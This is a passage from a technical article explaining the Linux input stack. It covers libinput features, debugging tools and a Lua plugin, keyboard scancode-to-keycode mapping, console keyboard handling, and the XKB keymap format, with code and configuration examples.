test each options, and have the features interact with one another,
cross-device communication.
Now why not handle it all directly, well because it’s messy. Multiple
devices have bad firmware and might send wrong capabilities and info
in their HID Report Descriptors, which will then be forwarded as-is
with evdev. Plus, having handling these in the driver would be even
more messy. For example, it could say that the size or resolution of
the touchpad is something while it’s something else. Or that the range
of valid inputs is 0 to 10 but that it’s 5-10. That’s why libinput
includes vendor-specific quirks handling in
/usr/share/libinput/
along with the help of hwdb, which we’ve seen earlier, that has
/usr/lib/udev/hwdb.d/60-evdev.hwdb
.
And this says that when a keyboard’s bus is over Bluetooth, it should
add the libinput attribute to say it’s an external keyboard.
The
60-evdev.hwdb
is mostly for touchpad’s axis, the device properties
set will look like this:
EVDEV_ABS_<axis>=<min>:<max>:<res>:<fuzz>:<flat>
# where <axis> is the hexadecimal EV_ABS code as listed in linux/input.h and# min, max, res, fuzz, flat are the decimal values to the respective fields of# the struct input_absinfo as listed in linux/input.h. If a field is missing# the field will be left as-is. Not all fields need to be present. e.g. ::45# sets the resolution to 45 units/mm.# resolution: it is given in units per millimeter and thus tells us the# size of the device. in the above case: (5112 - 1024)/42 means the device# is 97mm wide. The resolution is quite commonly wrong, a lot of axis# overrides need the resolution changed to the correct value.
Furthermore, apart from quirks, there are hardware physical issues,
such as the fact that some touchpads send out events before the finger
even touches them, or how to handle the difference in pressure on them,
or what to do to track different fingers on multitouch (MT) hardware
which requires handling evdev tracking ID and slots.
Here’s a two-fingers scroll example, see how complex that is:
Additionally, you also have misbehaving keyboards, with bad
firmware, buttons that are old, that get stuck, or send the same
events multiple time (so-called contact bouncing or chatter). We
need a mechanism to decide whether the event is valid or not, that’s
called hardware debouncing, and libinput does it out-of-the-box for us
(
see
),
which is truly impressive. This feature, with the help of the upper stack,
may also help people that have certain disabilities with involuntary
muscle movement.
So, for many reasons, libinput is indispensable!
We’ve already covered some of its features, let’s see more.
One of the interesting part of libinput is that it’s minimal in how
it decides to access external things. As we said, you can either opt
for events coming from udev, or manually pass them by path, both will
create libinput internal objects (pointer, keyboard, etc..). Furthermore,
libinput has no configuration files, it’s up to the caller to decide
how to configure each device, as we’ll see Wayland compositors and X11
have different ways. Similarly, it leaves the opening of evdev character
devices up to the caller implementation, usually either manually opening
it, which requires root privileges, or via
systemd-logind
or
seatd
, dbus
services which will automatically pass back the file descriptors of evdev
devices associated with the current “seat”.
A seat is a collection of input devices associated with a user
session. That seems redundant, since most machines have only one seat,
yet it only truly makes sense in multi-seat machines: one machine,
multiple input devices, with multiple users. Still, it takes this
particular use-case in consideration.
> libinput list-devices.
…
Device: SEMICO USB Keyboard
Kernel: /dev/input/event5
Id: usb:1a2c:6004
Group: 6
Seat: seat0, default
Capabilities: keyboard
…
> loginctl seat status # will list all input in the hierarchy
As you would’ve guessed, the safest and most favored way to get access
to evdev event file descriptors is through the delegation that
systemd-logind
provides. This is done in the code by implementing
open_restricted
to call the dbus service.
The seat is assigned with the
ENV{ID_SEAT}
udev property, which can be
controlled with the
loginctl
command. To permanently attach a device
to a seat.
There are alternatives to
logind
such as
elogind
and
seatd
that don’t depend on
systemd.
Another detail is that we’ve seen that the same physical device can
appear as multiple input devices on the system. With the help of udev,
libinput gets the device property
LIBINPUT_DEVICE_GROUP
to group them,
like that we can have the whole group under a single seat, which is more
logical than giving access to only part of a physical hardware.
And from
libinput list-devices
, look at the
Group
part:
Device: SEMICO USB Keyboard
Kernel: /dev/input/event5
Id: usb:1a2c:6004
Group: 6
Seat: seat0, default
Capabilities: keyboard
…
Device: SEMICO USB Keyboard Consumer Control
Kernel: /dev/input/event6
Id: usb:1a2c:6004
Group: 6
Seat: seat0, default
Capabilities: keyboard pointer
…
Device: SEMICO USB Keyboard System Control
Kernel: /dev/input/event7
Id: usb:1a2c:6004
Group: 6
Seat: seat0, default
Capabilities: keyboard
You can get more info on this by checking the related udev rule in
80-libinput-device-groups.rules
, which calls the built-in program
libinput-device-group
with the sysfs mount point. The
IMPORT{program}
basically uses a program right within
/usr/lib/udev/
directory.
As far as the technical features are concerned, there are the ones which
we listed earlier, so let’s explain the rest of them.
It offers full clickpad management. A clickpad (
INPUT_PROP_BUTTONPAD
)
is basically a touchpad with a single button, which we might not notice at
first because depending on where we press in the “software button area”
at the bottom, we have different behavior. That’s exactly the behavior
that libinput facilitates. It also handles what happens when a finger
enters or exits that area, these sort of edge cases.
Furthermore, libinput handles tap to click, be it one-finger tap for
left click, two-fingers for right click, and three-fingers tap for
middle click. While that seems simple in theory, libinput has to draw
the line between what is considered a tap and what is considered a finger
drag/move; indeed, our fingers aren’t very stable in the real world.
Unfortunately, by default libinput disables tapping when there are other
methods to trigger button clicks, but it can always be enabled again.
When talking about multiple fingers, the hardware needs to support
it obviously, but also libinput needs to track each one individually,
which is done via evdev tracking ID and slots, what we call multi-touch
handling or MT.
Within multi-touch we have the concept of “gestures” and libinput supports
two standard ones: swiping, fingers going in the same direction, and
pinching when fingers move apart or towards each others.
Similarly, there’s also different scrolling use-cases that are supported
by libinput: two-fingers scrolling, similar to a swipe, edge scrolling,
when there’s a specific area on the trackpad used for scrolling, and
on-button scrolling, which scrolls while having a button pressed just by
moving the finger.
The scrolling can either be horizontal or vertical. The user also has
a choice between natural scrolling an traditional scrolling; natural
scrolling matches the motion of the scroll like a phone, and traditional
scrolling matches the scroll bar directin so going downward will move
the page downward.
One thing libinput doesn’t provide when it comes to scrolling is kinetic
scrolling. Basically, scrolling that is faster or slower depending on
the speed. However, it allows widget libraries to implement it by relying
on the
libinput_event_pointer_get_axis_source()
function.
With all these, libinput offers palm and thumb detection to disable
the clickpad/touchpad when typing, or ignore a thumb in the corner or
accidental touches while other fingers are moving. It achieves this by
detecting the different pressure, speed, or touch sizes reported by evdev,
along with where they are happening (exclusion zones).
It’s also possible to automatically disable the touchpad when typing,
or when the lid is closed.
Lastly, libinput has lua plugins in
/usr/lib/libinput/plugins/
and
/etc/libinput/plugins
. As with other quirk fixing mechanisms in
udev and the quirk directory, the plugins are there for the last few
unfixable issues. They can be used to override evdev events.
libinput:register(1)-- register plugin version 1libinput:connect("new-evdev-device",function(_,device)ifdevice:vid()==0x046Danddevice:pid()==0xC548thendevice:connect("evdev-frame",function(_,frame)for_,eventinipairs(frame.events)doifevent.type==evdev.EV_RELand(event.code==evdev.REL_HWHEELorevent.code==evdev.REL_HWHEEL_HI_RES)thenevent.value=-event.valueendendreturnframeend)endend)
For example, the above script will reverse the horizontal scroll wheel
(
EV_REL.REL_HWHEEL
) event value for a certain device vendor and
product ID.
We’ve covered most of the libinput features, now let’s see how to debug
and interface with it.
The main command line interface is
libinput
, as we’ve seen it can allow
to
list-devices
, which is a quick summary of the devices it knows about
and on which seat they are connected. Yet most other commands are there
for debugging and testing.
libinput debug-gui
: is a graphical tool mostly to debug touchpad
libinput debug-events
: is a cli tool to debug all events as they are
interpreted by libinput, if you want it’s similar to
evtest
or
xev
in Xorg
libinput record
and
libinput replay
: Used to save and then simulate
again devices. This is amazing if you have a bug and want others to be
able to replicate it on their machines. This is similar to how
hid-tools
work.
libinput measure
: mostly used for touchpad, to measure things such
as pressure, touch size, tap to click time, etc..
The other way to interface with libinput is programmatically. Here’s
the most simple complete example I could come up with:
#include<libinput.h>
#include<libudev.h>
#include<fcntl.h>
#include<unistd.h>
#include<stdio.h>
#include<errno.h>
#include<string.h>staticintopen_restricted(constchar*path,intflags,void*user_data){intfd=open(path,flags);if(fd<0)fprintf(stderr,"Failed to open %s (%s)\n",path,strerror(errno));returnfd;}staticvoidclose_restricted(intfd,void*user_data){close(fd);}staticconststructlibinput_interfaceinterface={.open_restricted=open_restricted,.close_restricted=close_restricted,};intmain(void){structudev*udev=udev_new();if(!udev){fprintf(stderr,"Failed to create udev\n");return1;}structlibinput*li=libinput_udev_create_context(&interface,NULL,udev);if(!li){fprintf(stderr,"Failed to create libinput context\n");return1;}if(libinput_udev_assign_seat(li,"seat0")!=0){fprintf(stderr,"Failed to assign seat\n");return1;}structlibinput_event*event;while(1){libinput_dispatch(li);event=libinput_get_event(li);if(!event){usleep(10000);continue;}if(libinput_event_get_type(event)==LIBINPUT_EVENT_KEYBOARD_KEY){structlibinput_event_keyboard*k=libinput_event_get_keyboard_event(event);uint32_tkey=libinput_event_keyboard_get_key(k);enumlibinput_key_statestate=libinput_event_keyboard_get_key_state(k);printf("Key %u is %s\n",key,state==LIBINPUT_KEY_STATE_PRESSED?"PRESSED":"RELEASED");}libinput_event_destroy(event);}libinput_unref(li);udev_unref(udev);return0;}
But what about configuring devices, setting up things that we want to
setup per device. Well, as we’ve said this is done in the upper stack
since libinput has no configuration files, and we’ll cover this later. For
now let’s just list a few of the things that can actually be configured.
tap-to-click related, such as how many fingers are supported
three-finger drag
pointer acceleration profiles
scrolling method natural vs traditional
left-hand mode
middle button emulation
click method
disable while typing (DWT)
disable while trackpointing (DWTP)
direct-input device calibration
rotation confs (if touchpad is sideways)
area confs
You can glimpse at these on X11 with the command
xinput --list-props <device_id>
or at
libinput list-devices
which we’ve seen earlier that
should show the conf per-device:
That’s about it when it comes to libinput. Now we can move to more
specific things in the upper stack.
Keyboard Specifics
We’re pretty much done with the lower part of the user-space stack, but
before moving on to the graphical library widgets and desktop environments,
let’s take some time to see some of the specific device handling that
are good to know about, namely keyboards, mice, and gamepads.
In this section we’ll see three important concepts related to keyboards:
scancodes to keycodes, console keyboard handling, and XKB.
Scancodes to Keycodes
Like other input drivers, the role of keyboard drivers is to translate
from raw hardware keys to events that can be normalized and interpreted by
user-space. We call the raw keys scancodes, and the events ones keycodes
(
/usr/include/linux/input-event-codes.h
). Keycodes are also mapped
to key symbols in user-space unrelated to their actual keycodes, which we
call keysyms.
For example, a scancode can look like a random hex
0x1E
, a kernel-mapped
event as
KEY_A
, and a keysym will look like a symbol such as “a” or “A”.
We’ll talk more about keysyms mapping when we see XKB. But let’s focus
on the scancodes to keycode translation for now.
When a keyboard input device registers itself in the input core
(
input_register_device
) it has to report which keycodes it supports
in its capabilities (
keybit
capability). In general it has to set its
keycode
,
keycodemax
, and
keycodesize
fields, which are a map of
the translation of scancodes to keycodes.
These keymaps can either be full fledge dense keymap or sparse keymap,
which means they’re smaller and use less memory. The sparse keys are
mostly used when registering a few entries such as special keys that
don’t need huge arrays.
If a scancode isn’t found in these translation arrays, they’re often
either completely ignored, or the driver returns that it’s an unknown key.
Keyboard input devices can also optionally implement two important
functions:
getkeycode
and
setkeycode
, which will by default retrieve
the current keymap and alter the current keymap respectively. Most drivers
fallback to the default mechanism, so this can be taken for granted.
Importantly, the
evdev
and
kbd
(console) handlers offer ways to call
these via ioctl interfaces, which will be propagated to the devices
they’re currently handling. For
evdev
it’s through
EVIOCGKEYCODE
and
EVIOCSKEYCODE
, to get and set keycodes respectively. For the console
handler it’s through
KDGETKEYCODE
and
KDSETKEYCODE
. The exception
is that the console driver will propagate it to all handlers, and thus
indirectly to all devices on the platform.
You can also do the runtime patching of scancode to keycode
mapping through udev and hwdb by setting a device property in
ENV{KEYBOARD_KEY_<hex scan code>}=<key code identifier>
which will in
turn be caught by
systemd/src/udev/udev-builtin-keyboard.c
and also
call the same ioctl interfaces.
For example:
ENV{KEYBOARD_KEY_b4}=dollar
To find out the actual scancodes the device is generating the
showkey(1)
tool from the Linux Keyboard tools project, with the
--scancodes
flag,
will attach to the console handler and display them in raw mode. And the
setkeycodes(8)
command from the same project will propagate it to the
driver via the console input handler.
There are multiple other tools used to do the keycode remapping such
as
evmapd
,
evremap
,
evdevremapkeys
, but these work at the evdev
layer and don’t know about scancodes. So for now, the simplest one to
do scancode to keycode mapping is obviously the built-in one: hwdb.
This mechanism for runtime modifications might save us time instead of
getting our hands dirty and having to modify kernel drivers.
Console Keyboard
We’ve discussed the
evdev
handler extensively, however in the console
it’s the
kbd
input event handler (
drivers/tty/vt/keyboard.c
) that is
used, and it’s working in sync with the tty and line discipline mechanism.
This particular handler exposes its devices as TTYs in the infamous
/dev/ttyN
and
/dev/console
(system) and handles all the messiness
of console text-mode input.
The input handlers coexist. When switching from graphical environment
to console, the VT
kbd
handler takes over.
Obviously, as a console input handler, the
kbd
handler has much more
work to do, and it has a lot of special handling via ioctl too. From
bell and tone, leds, setting console key rate, modifiers, interpreting
special keys that have meanings for the TTY, switching to other modes
such as raw input mode or graphic (X11, Wayland session), all the push
towards line discipline, etc.. It’s handling things that are often
handled in user-space (key rate is handled in the graphical stack too
as we’ll see). The reason: historical entangling, the console existed
before the graphical stack.
For instance,
showkey(1)
which we’ve just seen, relies on changing the
mode of the terminal via ioctl
KDSKBMODE
to
K_RAW
.
There are a bunch of commands to interface with the ioctl such as
kbdrate(8)
to set the keyboard rate,
kbdinfo(1)
to get more info
about the kbd driver, and
kbd_mode(1)
to get the current keyboard mode
(raw, xlate, etc..)
Furthermore, since it’s taking a bigger role on handling scancode to
keycode, it also somewhat does keycode interpretation via its internal
keymap. That means, the
kbd
handler can be responsible of handling the
difference in regional keyboard layouts and special keys. This is
something which usually happens in XKB, in user-space, which we’ll see
in the next section.
Thus it has two sets of ioctl:
KDSETKEYCODE
and
KDGETKEYCODE
for
low-level scancodes to keycodes, and
KDGKBENT
and
KDSKBENT
for the
keycode to symbol/action mapping (internally also confusingly called
key_maps
, as you’ll see everyone uses the word “keymap”).
The format of the keymaps translating keycode to symbol (
keymaps(5)
)
is managed by the kernel for each console, but usually more
easily set with user-space tools also from the
Linux keyboard
tools
project. For example
loadkeys(1)
and
dumpkeys(1)
. These can rely on files in
/usr/share/kbd/keymaps/
for a predefined set of keymaps. Let’s also mention that the default
one is found in
/usr/src/linux/drivers/tty/vt/defkeymap.map
.
Before we end, let’s mention
systemd-localed.service(8)
and its
localectl(1)
command. It is used to set the keyboard map for
both the console and the graphical environment (XKB in X11 as we’ll see)
based on the current locale. For example, it sets the keymap,
font, and others, of the console and X11 XKB to the value found in
/etc/vconsole.conf
(see
vconsole.conf(5)
) through its service called
systemd-vconsole-setup(8)
, which is also called when the console is
initialized with udev. It can also help in setting the same values in
both the console and graphical stack.
Here’s
vconsole.conf
:
KEYMAP=us
XKBLAYOUT=us
> localectl
System Locale: LANG=en_US.UTF-8
VC Keymap: us
X11 Layout: us
NB: Terminal emulators don’t rely on the console input handler at all,
they use pseudo-terminals instead (PTYs). These don’t have VGA console,
nor plug to the kbd handler, nor screen, etc.. They are fed entirely by
user-space programs.
Example:
Line discipline <-> TTY driver (PTY slave side) <-> user process
`-> PTY master side <-> xterm process
Now let’s see how the keycode to keysym is done in user-space in the
graphical stack with XKB.
XKB
XKB, or X keyboard, is a common library (xkbcommon, xkbregistry,
xkbcompose) with a set of tools, an X11 protocol extension (X
Keyboard Extension), and a database collection of descriptions
(xkeyboard-config). Its role is to handle the keycode to keysym
translation in user-space.
While the name includes “X”, the common library and database are not only
used by Xorg but by most software, including graphical widgets such as
GTK and Qt, and Wayland compositors. We won’t cover the older X protocol
extension here, yet the reason why there’s an “X” in the name is that
it started as an extension and then got separated into a common library.
The two things we’ll focus on are xkbcommon, the xkb core engine that
parse and executes XKB definitions, and the xkeyboard-config, which
is a project compiling a database of keyboard info, layouts, variants,
symbols, and rules. They work together.
As a word of notice, XKB is one of the most complex piece of software I’ve
encountered and its documentation is fiercely lacking and dispersed. It
has its own language, compiler, and the format is extremely convoluted
and inconsistent, often mixing camel case and snake case for no apparent
reasons.
Even in the XKB documentation we find such comments:
Todo
Explain how to configure XKB, with examples
Due to the complexity of the format, this document is still is
construction.
And internally Xorg devs called it
“X Kitten Butcher”
.
We’ll try to make it approachable, and break the bad
spell. However, if you ever want more info check
the official
format
.
In order to perform the translation from keycodes coming from event
handlers to actual symbols, XKB relies on something called an XKB keymap
(yes everything is called a keymap). This XKB keymap is a compilation
of different components coming from the xkeyboard-config database that
are chosen based on the abstract, and more coherent, concept of layout,
variants, models, and options the user pick:
“RMLVO”
.
After this is picked, the XKB client software just has to keep track of
what’s called a state, and then send it along with the received keycode
to receive back the keysym.
A very basic example looks like this:
// create a complete keymap from the xkeyboard-config dbstructxkb_keymap*keymap;// .. and a state object to keep track of what special state we're in// that could affect the keysym outputstructxkb_state*state;…state=xkb_state_new(keymap);xkb_state_update_key(state,keycode,pressed?XKB_KEY_DOWN:XKB_KEY_UP);xkb_keysym_tsym=xkb_state_key_get_one_sym(state,keycode);
The XKB state object tracks what affects the output of keycode to keysym,
things like modifiers and groups. This example doesn’t mention the idea
of key composing, but we’ll come back to it.
This is important to understand, since you can either have XKB handle
what happens in a specific state when a key is pressed, or do it from
the client side. For example, a client can choose to catch all Ctrl keys
and interpret Ctrl+h as backspace, or leave it up to XKB with a custom
mechanism to know what Ctrl+h means, and the client will receive back
the keysym for backspace directly, with no special handling from its side.
Yet, the downside is that this key combination will apply to everyone
that relies on this XKB keymap.
Before moving forward, we need a little baggage of definitions, and
understanding, otherwise nothing will make sense.
evdev keycodes: the events coming from evdev, the ones listed in
/usr/include/linux/input-event-codes.h
XKB keysyms: Actual symbols (or dead key), actions, and special keys
that XKB will return, they exist in
/usr/include/xkbcommon/xkbcommon-keysyms.h
Modifier Keys: Special keys that can affect other keys such as shift,
alt, ctrl, “win”, etc.. Modifiers are also keysyms.
Geometry: The physical layout of a keyboard, what it looks like and
where the keys are
Levels and Groups: Levels is another state a key could be in when you
press a modifier. For example, it’s expected that pressing shift with
“a” will output “A”, upper case “A” is the level 2 of what happens when
pressing the key. A Group is similar but it completely switches the
whole keyboard to another key mapping, as if you switched variants.
As you can imagine, there’s a lot at play with levels, groups, modifiers,
and actions that can happen, and that’s apart from the basic idea of
keycodes to keysym.
Even when it comes to keysym, the translation isn’t straight away. XKB
relies on intermediary objects.
XKB keycodes are not straight up evdev keycodes, but
evdev keycodes + 8
. Why 8, someone might ask. Well, the only answer
is backward compatibility from before evdev was a thing, and it’s
still there.
Furthermore, XKB converts these keycodes into physical key
positions values that are compatible with ISO/IEC 9995-1. So we
move from evdev keycodes, to XKB keycodes, to physical abstract
position on a keyboard layout. This is what happens in the keycode
component files under
/usr/share/xkeyboard-config-2/keycodes/
. Keycodes
have this form within
<...>
tags. For example:
Or basically the first row from ISO/IEC 9995-1 on a keyboard.
To make it easier for users to pick an XKB keymap, without
having to know much details, the idea of picking only RMLVO,
Rules-Model-Layout-Variant-Options, was invented. This is an abstraction
on top to pick the components that make up a keymap, and thus come up with
the right keyboard behavior expected by the user. This is managed by the
XKB registry, which graphical environments interact with, this is what
is shown to the user when they’re asked about picking their keyboard
layout, the list of possible layouts and variants on those layouts,
along with special options.
Model – the name of the model of your keyboard
Layout – the layout(s) you intend to use (usually refer to country code)
Variant – the variant(s) of the layout(s) you intend to use (minor
and national variants)
Options – extra XKB configuration options to customize the standard
layout. For example to change modifier keys.
To know what’s actually picked as the final keymap, what’s called KcCGST,
we can run
xkbcli
. For example, for a dvorak keyboard, or a normal
qwerty keyboard:
> xkbcli compile-keymap --kccgst\--layout us \--variant dvorak \--options terminate:ctrl_alt_bksp
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us(dvorak)+inet(evdev)+terminate(ctrl_alt_bksp)"};
xkb_geometry { include "pc(pc105)"};};> xkbcli compile-keymap --kccgst\--layout us \--variant qwerty \--options terminate:ctrl_alt_bksp
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us(qwerty)+inet(evdev)+terminate(ctrl_alt_bksp)"};
xkb_geometry { include "pc(pc105)"};};
We’ll revisit the RMLVO, let’s just say it’s all about what the “rule”
part refers to: a lookup table with rules mapping the abstract names to
the components of the keymaps which are called KcCGST.
KcCGST, or the Keycodes, Compat, Geometry, Symbols, Types, are the
component parts of an XKB keymap. This is the actual functional XKB
configuration that is used behind the RMLVO easy facade. In general, XKB
considers it an implementation detail and pushes for users to favor
configuring XKB through RMLVO. Yet, it’s the core of XKB!
The resolution of the RMLVO will create a complete keymap, a self-contain
object that has all the related KcCGST components assembled together. This
complete XKB keymap is what is used by the clients.
To get a quick glimpse at what a full resolved keymap looks like, try
this command:
> xkbcli compile-keymap --layout us --rules evdev
Or for a more compact one, look again at the command such as the one we
just did before:
> xkbcli compile-keymap --kccgst--layout us --options terminate:ctrl_alt_bksp
xkb_keymap {
xkb_keycodes { include "evdev+aliases(qwerty)"};
xkb_types { include "complete"};
xkb_compat { include "complete"};
xkb_symbols { include "pc+us+inet(evdev)+terminate(ctrl_alt_bksp)"};
xkb_geometry { include "pc(pc105)"};};
Let’s go over these components and explain them.
First of, the KcCGST configurations that come from the keyboard-config
project are often found in the following places in reverse order of
precedence, with the component bundled underneath:
Most of the components have a useful utility. That’s apart from the
geometry, which is a complex file used to describe what a keyboard
physical layout looks like. It’s not used in the latest xkbcommon
mechanism though, so we’ll skip explaining it.
The XKB configuration format has types: string, numbers, key positions,
and keysym:
"hello"
,
"%S/pc"
42
,
134
<AE12>
,
<BKSP>
percent
,
a
,
A
It also has many special keywords, and some structure format. The main
structural format is called a component, basically the components of
the KcCGST. Each XKB conf file is an aggregation of multiple of these
components. They have the form:
default
: One of these “variant” per component file, the default
values to be used
partial
: To be used in another conf
hidden
: Only used internally within the file’s scope
And the symbols flags can be one or many of these:
alphanumeric_keys
modifier_keys
keypad_keys
function_keys
alternate_group
The symbols flags are mostly metadata and don’t affect the XKB processing.
They’re indicators of what the component configuration covers, and if
none are present it’s assumed it covers a complete keyboard.
Let’s start with the most important keywords, the ones used to import
and merge files together, we’ve seen the
include
. It works by finding
the file of the same component with the specified name, if it exists
in any of the valid conf paths (or if explicitly mentioned with string
substitution shorthands), and then look for the variants inside or the
default value if none are passed:
include "file(variant)"
.
The
include
will override any information that already exists:
that is if new values are undefined it will keep the old one, but new
defined values will always override old ones. To avoid this, the
augment
"file(variant)"
should be used instead, it will update the properties
that are undefined, but keep the defined ones (it’s the reverse). Another
option is the
replace "file(variant)"
which will, as the name implies,
completely replace the full properties, regardless if some elements are
defined or not.
This “merge resolution” mechanism also applies to values within the
components objects, which can be tagged with
augment
,
override
,
replace
, too.
As for files, a shorthand exists to have a single statement with multiple
includes concatenated. In this case the following merge mode prefixes
are used:
+
selects the override merge mode (default).
|
selects the augment merge mode.
^
selects the replace merge mode.
So you can now understand why the following line we’ve seen works, and
how it creates an inheritance mechanism, plugging multiple files together:
Let’s now explain what each component does, and wrap up with how the
rules mechanism of the RMLVO then resolves them into an XKB full keymap.
The keycodes file is the most obvious one and the first entry-point
for XKB logic, it translates from XKB keycodes to the physical codes
ISO/IEC 9995-1. The syntax of the components looks something like this:
defaultxkb_keycodes"mykeycode"{// defining the rangeminimum=8;maximum=255;// mapping of keycodes to layout keys<TAB>=23;<AD01>=24;<AD02>=25;<AD03>=26;<AD04>=27;<AD05>=28;<AD06>=29;<BKSL>=51;<RTRN>=36;// making one physical key name equivalent to anotheralias<LatQ>=<AD01>;alias<LatW>=<AD02>;alias<LatE>=<AD03>;alias<LatR>=<AD04>;alias<LatT>=<AD05>;alias<LatY>=<AD06>;// these are for LEDs, not always used by clientsindicator1="Caps Lock";indicator2="Num Lock";indicator3="Scroll Lock";};
The syntax is straight forward, it’s a couple of assignment, with the
possibility to have aliases, and giving names to LEDs, indicators, which
aren’t really leds afaik but keys that lock or latch. By convention it
explicitly names special keys, but other keys as their ISO positions.
Here’s a standard keyboard with its key positions:
Let’s move to the types component. This is where the information about
levels, and how to switch between them is defined.
virtual_modifiersNumLock;type"ONE_LEVEL"{modifiers=None;map[None]=Level1;level_name[Level1]="Any";};type"TWO_LEVEL"{modifiers=Shift;map[Shift]=Level2;level_name[Level1]="Base";level_name[Level2]="Shift";};type"ALPHABETIC"{modifiers=Shift+Lock;map[Shift]=Level2;map[Lock]=Level2;level_name[Level1]="Base";level_name[Level2]="Caps";};// override ALPHABETIC Shift will cancel capslockoverridetype"ALPHABETIC"{modifiers=Shift+Lock;map[Shift]=Level2;preserve[Lock]=Lock;level_name[Level1]="Base";level_name[Level2]="Caps";};// override ALPHABETIC, Shift will ignore capslockoverridetype"ALPHABETIC"{modifiers=Shift;map[Shift]=Level2;level_name[Level1]="Base";level_name[Level2]="Caps";};// CapsLock acts as Shift with locking, Shift does not cancel CapsLock.type"ALPHABETIC"{modifiers=Shift+Lock;map[Shift]=Level2;map[Lock]=Level2;map[Shift+Lock]=Level2;level_name[Level1]="Base";level_name[Level2]="Caps";};
The syntax here is more cumbersome. Firstly, there are some definition
lines. In each
type
entry (which can be prepended with merge syntax
like anything else in this syntax really) of the form
type "name"
,
we have to define the modifiers that will be used as such:
modifiers=Shift+Lock;
The
+
, is just a separator here.
If the modifiers are not real keysym but virtual ones, then those virtual
modifiers also need to be defined earlier in the scope:
virtual_modifiersNumLock;
After defining the modifiers that are used for that type, we have a series
of mapping to define the combination and what levels these will achieve.
This has to do with how XKB consumes modifiers as it processes types
and outputs keysyms, its internal list of effective modifiers. Simply
said, without the
preserve
when the keysym is sent back to the client
(
xkb_state_key_get_one_sym
) the state object doesn’t consume the
modifier, so the client can inspect it for further special handling.
The logic within XKB clients looks something like this:
That’s useful for layout where you have, let’s say Greek letters for
Level1 and Level2, and at Level3 and Level4 there are the usual Latin
letters. So you’d want to preserve
Ctrl
and
Shift
, so that the
application can catch
Ctrl+c
for example, which would be in Level3
(Latin lower-case).
I’ve added different versions of the
ALPHABETIC
type in the example,
and how the capslock and shift combinations can affect letters.
Later on we’ll see how we assign the levels logic to symbols and
compatibility logic, but let’s just say that XKB will categorize keys
with a heuristic and assign them to default types if no other types were
explicitly chosen. These are:
"ONE_LEVEL"
: When there are only one level change for the keysym
"TWO_LEVEL"
: When there are exacly two levels change for the keysym
"ALPHABETIC"
: When the keysym is alphabetic and has two levels
"KEYPAD"
: For keypad keys of any level (two usually)
"FOUR_LEVEL_ALPHABETIC"
,
"FOUR_LEVEL_SEMIALPHABETIC"
, 3 to 4 keysym
"FOUR_LEVEL"
: When nothing else matches
The next component is the XKB compatibility, which is used to translate
key combinations into action statements. Actions can also be attached
directly in the XKB symbols component for each key, however it’s done in
the compatibility layer because it has a mechanism for generic pattern
matching of keysym combinations, so we don’t have to repeat the same
things in different places.
The actions that can be done in the XKB compatibility are varied
from latching/unlatching/locking/unlocking modifiers, changing level,
switching group, etc.. Many of these actions, however, only make sense in
combination with the XKB symbols component, so keep that in mind for now.
A compatibility map looks something like:
defaultxkb_compatibility"basic"{virtual_modifiersNumLock,AltGr;...interpret.repeat=False;setMods.clearLocks=True;...interpretShift_Lock+AnyOf(Shift+Lock){action=LockMods(modifiers=Shift);};...group2=AltGr;...indicator.allowExplicit=False;...indicator"Caps Lock"{whichModState=Locked;modifiers=Lock;};...};defaultpartialxkb_compatibility"pc"{// Sets the "Alt" virtual modifier.virtual_modifiersAlt;setMods.clearLocks=True;interpretAlt_L+Any{virtualModifier=Alt;action=SetMods(modifiers=modMapMods);};interpretAlt_R+Any{virtualModifier=Alt;action=SetMods(modifiers=modMapMods);};};
This has many components, the
interpret
sections to map keys to actions,
the virtual modifier definitions, indicators, repeat behavior of keys,
and more. The important part is the
interpret
section which matches
keysym along with a modifier (
AnyOfOrNone
,
AnyOf
,
Any
,
NoneOf
,
AllOf
,
Exactly
). The body of the interpret can also be more specific
by setting values of
useModMapMods
to match a certain level.
Default values to params can be set globally such as
setMods.clearLocks
,
which affects how
SetMods
and other mods actions behave.
The list of possibilities and actions within the compatibility is
too long to explain here, the list is extensive and can be found
here
.
Let’s move to the keysym or symbol component, which as you would
have guessed, finally maps physical keys in ISO location format to
symbols. These files are often named after countries or languages or
specific features,
us
,
jp
,
group
.
It first has a metadata name in the
name[GroupX] = "Symbols Name"
property, which can also be used to find which groups the symbols
belong to.
This is also where virtual modifiers are mapped to actual keys with the
modifier_map VIRTUAL_MOD { Symbol1, Symbol2}
.
And obviously, that’s where the
key <VAL>
are mapped to list of groups
within
{}
, and levels within
[]
.
key<TLDE>{[quoteleft,asciitilde]};
This means the physical key
<TLDE>
, in level1 will output a left quote
(backtick), and in level2 will output the tilde character.
Additionally, we can also specify within the curly brackets whether a
specific type should be used instead of the default matching one:
Similarly, the actions can be assigned here instead of in the
compatibility component, and the groups can also be explicitly expressed with
the syntax:
That all should cover the KcCGST component syntax. It’s very long already,
I know, yet it barely covers the basics. Let’s see a few examples to
grasp the concepts.
In
symbol/group
we have:
// The left Alt key (while pressed) chooses the next group.partialmodifier_keysxkb_symbols"lswitch"{key<LALT>{[Mode_switch,Multi_key]};};
And in
compat/basic
we have these
interpret
:
interpretMode_switch{action=SetGroup(group=+1);};
The
Multi_key
maps to a compose key in
compat/ledcompose
:
Here’s another example swapping the top row numbers on shift:
defaultpartialalphanumeric_keysxkb_symbols"basic"{include"us(basic)"name[Group1]="Banana (US)";key<AE01>{[exclam,1]};key<AE02>{[at,2]};key<AE03>{[numbersign,3]};key<AE04>{[dollar,4]};key<AE05>{[percent,5]};key<AE06>{[asciicircum,6]};key<AE07>{[ampersand,7]};key<AE08>{[asterisk,8]};key<AE09>{[parenleft,9]};key<AE10>{[parenright,0]};key<AE11>{[underscore,minus]};key<AE12>{[plus,equal]};};// Same as banana but map the euro sign to the 5 keypartialalphanumeric_keysxkb_symbols"orange"{include"banana(basic)"name[Group1]="Banana (Eurosign on 5)";include"eurosign(5)"};
Here’s a symbol component which replaces key “B” to have a third level
activated with the right alt to display a broccoli.
NB
: XKB has keysym to allow controlling the mouse pointer from the
keyboard, this can be useful if clients actually understand these keysym
and act on them.
It’s fine and all but we need the RMLVO so that the users can actually
use the keymap properly without bothering with all that we’ve seen.
The rules are in the
rules
directory as simple files without extensions,
and are accompanied with two listing files for GUI selectors:
*.lst
and
*.xml
that follow the
xkb.dtd
in the same directory. The listing
